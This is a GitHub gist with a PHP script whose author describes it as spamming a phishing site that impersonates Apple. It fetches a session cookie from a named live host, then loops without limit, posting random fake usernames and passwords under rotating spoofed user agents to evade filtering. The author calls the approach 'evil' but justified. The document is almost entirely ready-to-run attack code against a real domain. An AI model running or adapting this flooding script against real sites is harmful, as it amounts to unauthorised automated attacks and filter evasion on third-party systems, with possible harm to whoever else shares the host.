Skip to content

Instantly share code, notes, and snippets.

@medeirosT
Created October 31, 2019 02:37
Show Gist options
  • Save medeirosT/c13c97f35009346643e1f41daf3afdc0 to your computer and use it in GitHub Desktop.
Save medeirosT/c13c97f35009346643e1f41daf3afdc0 to your computer and use it in GitHub Desktop.
There's a website pretending to be apple, its emails are even passing some spam filters. Let's spam them.
<?php
/**
* Returns a string with random alphanumeric characters.
* @param {integer} length - Size of randomized string we're returning, default is 10
* @return {string} randomized string.
*/
function generate_random_string($length = 10) {
return substr(str_shuffle(str_repeat($x='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length/strlen($x)) )),1,$length);
}
/**
* Returns a string with a random user agent
* @return {string} random user agent to inject in the request header
*/
function get_random_useragent(){
$agents = array(
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36"
);
return $agents[rand(0,count($agents)-1)];
}
// This is where we are sending the garbage data
$post_url = "https://pagelayout-safelogin2000.fvhdstgeorgesschoolbirmingham.com/account/truelogin.php";
// This is where we obtain the elusive PHPSESSIONID
$session_url = "https://pagelayout-safelogin2000.fvhdstgeorgesschoolbirmingham.com/account/";
// We inject this to add further validity to our requests
$hostname_url = "pagelayout-safelogin2000.fvhdstgeorgesschoolbirmingham.com";
// So I can reuse this in the future, this is the cookie name for the session ID.
$session_cookie_name = "PHPSESSID";
$garbage_creds_sent = 0;
// We check for Curl's presence in your PHP environment
if (in_array ('curl', get_loaded_extensions())) {
echo "curl installed\n";
echo "Obtaining new PHP Session ID...\n";
// Initiate an instance of Curl, let's get that sessionID
$ch = curl_init($session_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
$result = curl_exec($ch);
// REGEX to find all cookies in the returned header
preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $result, $matches);
// Let's loop through them...
$cookies = array();
foreach($matches[1] as $item) {
parse_str($item, $cookie);
$cookies = array_merge($cookies, $cookie);
}
// Check if the cookie we're looking for exists...
if ( $cookies[$session_cookie_name] ){
echo "I'm in! Initiating spam!\n";
// This will stop the while loop if we find something odd with the return
$has_error = false;
// Let the games begin
while( $has_error === false ){
$ch = curl_init($post_url);
// we're setting up our cookie we got in the beginning and a fake user agent
// some websites filter against this. I know this is evil but screw these phishing
// scoundrels!
$headers = array(
"Cookie: $session_cookie_name=". $cookies[$session_cookie_name],
"Content-type: application/x-www-form-urlencoded; charset=UTF-8",
"Host: $hostname_url",
"Origin: https:\\\\$hostname_url",
// Randomized user agent because why not?
"User-Agent: " . get_random_useragent()
);
// A few more settings, remember we're sending this info as POST
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_POST, 1);
// I also randomize the size of the garbage we're sending so they can't just query passwords/users of a certain size.
curl_setopt($ch, CURLOPT_POSTFIELDS, "xuser=" . generate_random_string(rand(5,32)) . "&xpass=" . generate_random_string(rand(8,128)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// GO!
$return = curl_exec($ch);
// Now we check what we got
if (!curl_errno($ch)) {
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
// If we get an HTTP Code of 200 (Success) and an empty string (meaning no PHP errors on their side...)
if ( $http_code === 200 && $return == ""){
// Count this as a win
$garbage_creds_sent++;
// Show our kind users they are making a difference!
echo "Hit! ($garbage_creds_sent so far!)\n";
}
}
// Close this instance!
curl_close($ch);
}
} else {
// Couldn't find the session cookie
echo "Could not find configured cookie...\n";
// Let's exit gracefully..
exit(2);
}
// If they don't give us a 200 or a PHP error occurs, the while loop should stop, and we should tell the user something happened.
echo "I think either their site went down or they caught up to us. However... We sent them " . $garbage_creds_sent . " bad login(s)!";
exit(0);
} else {
// Plain and simple, you don't have curl. Please install.
echo "Please install Curl\n";
exit(1);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment